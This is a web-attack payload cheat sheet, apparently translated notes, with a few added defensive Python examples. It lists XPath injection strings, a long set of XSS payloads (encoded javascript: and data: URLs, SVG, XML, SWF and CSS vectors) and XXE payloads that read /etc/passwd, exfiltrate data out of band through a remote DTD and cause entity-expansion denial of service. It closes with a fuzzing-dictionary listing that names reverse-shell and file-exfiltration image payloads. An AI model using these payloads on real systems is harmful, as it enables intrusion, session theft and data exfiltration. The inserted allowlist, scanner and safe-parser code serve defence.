/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
19. File upload
Exploit
Only the exploitable angles are listed here, without detailing each one.
1. Blacklist bypass
2. Double file upload
3. Arrays
4. Modified special fields
5. Truncation
6. Parsing vulnerabilities
7. ffmpeg
8. Flash
9. ImageMagick
10. Zip symlinks
11. .htaccess
12. IIS
13. SSI
14. PDF
15. Python
16. CSP
17. XSS
18. Oversized-file DoS
19. XXE
20. URL redirection
20. XPath injection
Query: string(//user[name/text()='" +username+ "' and password/text()='" +password+ "']/account/text())
Payloads:
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
Blind injection:
1. Length: and string-length(account)=SIZE_INT
2. Content:
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
21、XSS
Basic
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)>
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
javascript: protocol
javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
javascript:confirm(1)
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
java%0ascript:alert(1) - LF (\n)
java%09script:alert(1) - tab (\t)
java%0dscript:alert(1) - CR (\r)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) - escape
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)
data: protocol
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
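The javascript: and data: variants above all resolve to the same scheme once the encoding layers (HTML entities, \xHH / \uHHHH / octal escapes, backslash-split letters, embedded tab/LF/CR) are removed, which is why a literal "starts with javascript:" filter on an href is not a defence. The following is an added example, not code from the original notes, showing how a server-side allowlist check can first normalise the value the way a browser would and then read the scheme off the result. The function names (`effective_scheme`, `is_safe_href`), the `ALLOWED_SCHEMES` set and the decoding-round limit are assumptions of this example:

```python
"""Resolve the effective URL scheme a browser would act on, then allowlist it.

Added example: decodes percent-encoding, JavaScript string escapes and HTML
character references repeatedly until the value is stable, applies the
whitespace handling of the WHATWG URL parser, and only then reads the scheme.
"""
import html
import re
import urllib.parse

# Browsers strip leading/trailing C0 controls and spaces from a URL and delete
# tab, LF and CR anywhere inside it, so "java\nscript:" is still "javascript:".
_C0_AND_SPACE = "".join(map(chr, range(0x21)))
_TAB_LF_CR = re.compile(r"[\t\n\r]")
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")
# JavaScript string escapes: \xHH, \u{H...}, \uHHHH, octal \ooo, and \c -> c.
_JS_ESCAPE = re.compile(
    r"\\(?:x([0-9A-Fa-f]{2})|u\{([0-9A-Fa-f]+)\}|u([0-9A-Fa-f]{4})|([0-7]{1,3})|(.))",
    re.DOTALL,
)
_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f", "v": "\v"}

# Assumed policy for this example: "" stands for a relative URL (no scheme).
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto", ""})


def _chr(code: int) -> str:
    return chr(code) if code <= 0x10FFFF else ""


def js_unescape(s: str) -> str:
    """Undo JavaScript string escapes, e.g. \\x6A -> j, \\152 -> j, \\j -> j."""
    def repl(m):
        hx, brace, uni, octal, other = m.groups()
        if hx:
            return _chr(int(hx, 16))
        if brace:
            return _chr(int(brace, 16))
        if uni:
            return _chr(int(uni, 16))
        if octal:
            return _chr(int(octal, 8))
        return _SIMPLE_ESCAPES.get(other, other)
    return _JS_ESCAPE.sub(repl, s)


def effective_scheme(value: str, max_rounds: int = 5) -> str:
    """Return the lower-cased scheme a browser would see, or "" if there is none.

    Decoding is repeated until the value stops changing (bounded by max_rounds)
    so that double-encoded forms such as %26%23106 (-> &#106 -> j) are handled.
    """
    s = value
    for _ in range(max_rounds):
        decoded = html.unescape(js_unescape(urllib.parse.unquote(s)))
        if decoded == s:
            break
        s = decoded
    s = _TAB_LF_CR.sub("", s.strip(_C0_AND_SPACE))
    m = _SCHEME.match(s)
    return m.group(1).lower() if m else ""


def is_safe_href(value: str) -> bool:
    """Allowlist check: only explicitly trusted schemes (or relative URLs) pass."""
    return effective_scheme(value) in ALLOWED_SCHEMES


if __name__ == "__main__":
    # Constructed samples taken from the variants listed above.
    for sample in [
        "javascript:prompt(1)",
        "\\152\\141\\166\\141\\163\\143\\162\\151\\160\\164\\072alert(1)",
        "java%0ascript:alert(1)",
        "https://example.com/?next=javascript:alert(1)",
    ]:
        print(f"{sample!r:70} -> scheme={effective_scheme(sample)!r} safe={is_safe_href(sample)}")
```

Note that this is an allowlist, not a blocklist: a relative URL or https: link is accepted, everything else (javascript:, data:, vbscript:, unknown schemes) is refused, so a new obfuscation only has to be decoded correctly, never enumerated.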
XML file
// Use CDATA so the payload is not parsed as XML
<html>
  <head></head>
  <body>
    <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
    <info>
      <name>
        <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
      </name>
      <description>
        <value>Hello</value>
      </description>
      <url>
        <value>http://www.baidu.com</value>
      </url>
    </info>
  </body>
</html>
SVG file
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>
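The XML file and SVG file above carry script in three different shapes: a `<script>` element (in the SVG namespace, or under an arbitrary prefix bound to the XHTML namespace as in `<something:script>`), an `on*` event-handler attribute, and `<script>` markup wrapped in CDATA that is inert as XML but goes live the moment the text is copied into an HTML page. An upload handler that wants to refuse such files needs to look at namespaces, not prefixes, and at CDATA contents, not only elements. The scanner below is an added example, not code from the original notes; it uses only the standard-library expat bindings with namespace processing turned on. The function name `scan_for_active_content`, the finding strings and the two `SAMPLE_*` documents (constructed copies of the two files above) are assumptions of this example:

```python
"""Flag active content in an uploaded SVG/XML file before storing or serving it.

Added example. Findings are returned as plain strings so the caller can log
them and reject the upload; an empty list means nothing suspicious was seen.
"""
import xml.parsers.expat

# Namespaces whose <script> element a browser executes when rendering the file
# ("" covers documents that declare no namespace at all).
_SCRIPT_NAMESPACES = {"", "http://www.w3.org/2000/svg", "http://www.w3.org/1999/xhtml"}

# Constructed copies of the two files above, used by the demo and the tests.
SAMPLE_XML = b"""<html><head></head><body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<info><name><value><![CDATA[<script>confirm(document.domain)</script>]]></value></name>
<description><value>Hello</value></description></info></body></html>"""

SAMPLE_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript"> alert(document.domain); </script>
</svg>"""


def _split(name: str):
    """expat reports namespaced names as "<uri> <local>"; return (uri, local)."""
    uri, _, local = name.rpartition(" ")
    return uri, local


def scan_for_active_content(data: bytes) -> list:
    """Return a list of findings describing executable content in the document."""
    findings = []
    # namespace_separator=" " turns on namespace processing, so a prefix such
    # as "something:" is resolved to its URI instead of hiding the element.
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")
    text_buf = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # expat does not fetch the external subset here; we only record it.
        findings.append(f"DOCTYPE {name} (system id {sysid!r})")

    def on_start(name, attrs):
        uri, local = _split(name)
        if local.lower() == "script" and uri in _SCRIPT_NAMESPACES:
            findings.append(f"script element <{local}> in namespace {uri or '(none)'}")
        for attr in attrs:
            a_local = _split(attr)[1].lower()
            if a_local.startswith("on"):
                findings.append(f"event handler {a_local}= on <{local}>")
        text_buf.clear()

    def on_chars(text):
        # Called for ordinary text and for CDATA contents, possibly in pieces.
        text_buf.append(text)

    def on_end(name):
        if "<script" in "".join(text_buf).lower():
            findings.append(f"script markup inside text/CDATA of <{_split(name)[1]}>")
        text_buf.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        # A file that is not well-formed XML should not be accepted as SVG either.
        findings.append(f"not well-formed: {exc}")
    return findings


if __name__ == "__main__":
    for label, doc in (("xml", SAMPLE_XML), ("svg", SAMPLE_SVG)):
        print(label, scan_for_active_content(doc))
```

This is a reject-or-accept check, not a sanitiser; even a clean SVG should be served from a separate origin or with `Content-Disposition: attachment`, since an inline SVG on the application origin runs with that origin's cookies.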
SWF
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
phpmyadmin/js/canvg/flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
CSS
<!DOCTYPE html>
<html>
  <head>
    <style>
      div{
        background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
        background-color: #cccccc;
      }
    </style>
  </head>
  <body>
    <div>lol</div>
  </body>
</html>
22、XXE
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

Base64
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>

PHP wrapper
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >
]>
<foo>&xxe;</foo>

DOS
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

Blind XXE
Payload sent:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

File on the remote host: http://127.0.0.1/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">

XXE in files
DOCX/XLSX/PPTX
ODT/ODG/ODP/ODS
SVG
XML
PDF (experimental)
JPG (experimental)
GIF (experimental)
Exploitation tool: https://github.com/BuffaloWill/oxml_xxe
Online generator: https://buer.haus/xxegen/
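Every XXE payload above, whether it reads file:///etc/passwd, pulls a data:// or php://filter resource, expands entities recursively for denial of service, or exfiltrates out of band through a remote DTD, needs a DOCTYPE to declare its entities. A parser that refuses any DOCTYPE therefore refuses all of them without having to enumerate the individual tricks. The parser below is an added example, not code from the original notes; it uses only the standard-library expat bindings. The names `parse_untrusted_xml`, `classify` and `UnsafeXMLError`, and the minimal dict tree it returns, are assumptions of this example:

```python
"""Parse XML from an untrusted source while refusing DOCTYPE and external entities.

Added example: expat calls StartDoctypeDeclHandler before it reads the internal
subset, so raising there means no <!ENTITY ...> is ever defined, let alone
expanded or fetched.
"""
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """The document tried to use a feature this parser does not allow."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse into {"tag", "attrs", "text", "children"} nodes, root node returned.

    Raises UnsafeXMLError for any DOCTYPE or external entity reference and
    xml.parsers.expat.ExpatError for input that is not well-formed.
    """
    parser = xml.parsers.expat.ParserCreate()
    stack = [{"tag": None, "attrs": {}, "text": "", "children": []}]  # holder for the root

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE {name!r} is not allowed in untrusted XML")

    def on_external_entity(context, base, sysid, pubid):
        # Defence in depth: only reachable if a DOCTYPE were ever accepted.
        raise UnsafeXMLError(f"external entity {sysid!r} is not allowed")

    def on_start(tag, attrs):
        node = {"tag": tag, "attrs": dict(attrs), "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def on_end(tag):
        stack.pop()

    def on_chars(text):
        stack[-1]["text"] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars
    parser.Parse(data, True)
    return stack[0]["children"][0]


def classify(data: bytes) -> str:
    """Triage helper: "ok", "rejected" (policy violation) or "malformed"."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXMLError:
        return "rejected"
    except xml.parsers.expat.ExpatError:
        return "malformed"
    return "ok"


if __name__ == "__main__":
    # Constructed samples: a benign document and the file:///etc/passwd payload above.
    benign = b"<foo><bar>hi</bar></foo>"
    xxe = (b'<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY >'
           b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>')
    print("benign:", classify(benign), parse_untrusted_xml(benign))
    print("xxe:", classify(xxe))
```

Rejecting at the DOCTYPE is deliberately coarse: it also refuses harmless documents that carry a DTD reference, which is the right trade-off for an endpoint that only ever expects plain data XML. Where a DTD is genuinely required, the same handlers can be kept and only the external-entity refusal retained, but internal entity expansion must then be bounded separately.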
Those interested can build a vulnerability-fuzzing dictionary along these lines; it is very useful.
w2n1ck@w2n1ck ~/Desktop/vul_fuzz tree -FC .
.
├── api.txt
├── command_exec.txt
├── crlf.txt
├── dicc.txt
├── directory_traversal.txt
├── ldap_attributes.txt
├── lfi.txt
├── nosql.txt
├── open_redirect.txt
├── php.txt
├── sqli/
│   ├── sqli.txt
│   ├── sqli_error.txt
│   ├── sqli_mssql.txt
│   ├── sqli_mssql_insert.txt
│   ├── sqli_mssql_where.txt
│   ├── sqli_mysql.txt
│   ├── sqli_mysql_insert.txt
│   ├── sqli_mysql_order_by.txt
│   ├── sqli_mysql_where.txt
│   ├── sqli_oracle.txt
│   ├── sqli_postgres.txt
│   ├── sqli_time.txt
│   └── sqli_union.txt
├── ssi.txt
├── upload/
│   ├── ffmpeg/
│   │   ├── gen_avi_bypass.py
│   │   ├── gen_xbin_avi.py
│   │   ├── read_passwd.avi
│   │   ├── read_passwd_bypass.mp4
│   │   ├── read_shadow.avi
│   │   └── read_shadow_bypass.mp4
│   ├── flash/
│   │   ├── xss.swf
│   │   └── xssproject.swf
│   ├── htaccess/
│   │   └── 1.jpg
│   ├── iis/
│   │   ├── index.stm
│   │   └── web.config
│   ├── imagemagic/
│   │   ├── centos_id.jpg
│   │   ├── payload_imageover_file_exfiltration_pangu_wrapper.jpg
│   │   ├── payload_imageover_file_exfiltration_text_wrapper.jpg
│   │   ├── payload_imageover_reverse_shell_devtcp.jpg
│   │   ├── payload_imageover_reverse_shell_netcat_fifo.png
│   │   ├── payload_imageover_wget.gif
│   │   ├── payload_url_bind_shell_nc.mvg
│   │   ├── payload_url_curl.png
│   │   ├── payload_url_portscan.jpg
│   │   ├── payload_url_remote_connection.mvg
│   │   ├── payload_url_reverse_shell_bash.mvg
│   │   ├── payload_url_touch.jpg
│   │   ├── payload_xml_reverse_shell_nctraditional.xml
│   │   ├── payload_xml_reverse_shell_netcat_encoded.xml
│   │   ├── ubuntu_id.jpg
│   │   └── ubuntu_shell.jpg
│   ├── pdf/
│   │   ├── poc.js
│   │   ├── poc.py
│   │   └── result.pdf
│   ├── php_ext/
│   │   ├── phpinfo.jpg.php
│   │   ├── phpinfo.php3
│   │   ├── phpinfo.php4
│   │   ├── phpinfo.php5
│   │   ├── phpinfo.php7
│   │   ├── phpinfo.phpt
│   │   ├── phpinfo.pht
│   │   └── phpinfo.phtml
│   ├── picture/
│   │   ├── Build_image_to_LFI.py
│   │   ├── php_exif_data.png
│   │   ├── phpinfo-metadata.gif
│   │   ├── phpinfo-metadata.jpg
│   │   ├── shell_cinema.gif
│   │   ├── shell_fr.gif
│   │   └── shell_problem.gif
│   ├── python/
│   │   ├── python-admin-__init__.py.zip
│   │   ├── python-conf-__init__.py.zip
│   │   ├── python-config-__init__.py.zip
│   │   ├── python-controllers-__init__.py.zip
│   │   ├── python-generate-init.py
│   │   ├── python-login-__init__.py.zip
│   │   ├── python-models-__init__.py.zip
│   │   ├── python-modules-__init__.py.zip
│   │   ├── python-scripts-__init__.py.zip
│   │   ├── python-settings-__init__.py.zip
│   │   ├── python-tests-__init__.py.zip
│   │   ├── python-urls-__init__.py.zip
│   │   ├── python-utils-__init__.py.zip
│   │   └── python-view-__init__.py.zip
│   ├── ssi/
│   │   ├── exec.shtml
│   │   └── include.shtml
│   └── zip_link/
│       ├── etc_passwd.zip
│       ├── generate.sh
│       └── passwd
├── web_cache_deception_attack_headers.txt
├── xpath_injection.txt
├── xss/
│   ├── "><img\ src=x\ onerror=alert(document.cookie);.jpg
│   ├── "><svg\ onload=alert(1)>
│   ├── xss_comment_exif_metadata_double_quote.png
│   ├── xss_flashfile.swf
│   ├── xss_intruders.txt
│   ├── xss_payloads.txt
│   ├── xss_svg.svg
│   ├── xss_svg1.svg
│   ├── xss_svg2.svg
│   ├── xss_svg3.svg
│   ├── xss_swf.swf
│   ├── xss_swf_fuzz.txt
│   ├── xss_xml.xml
│   └── xss_xml_cheatsheet.html
└── xxe/
    ├── xml-attacks.txt
    ├── xxe_etc_passwd.xml
    ├── xxe_fuzzing.txt
    └── xxe_php_wrapper.xml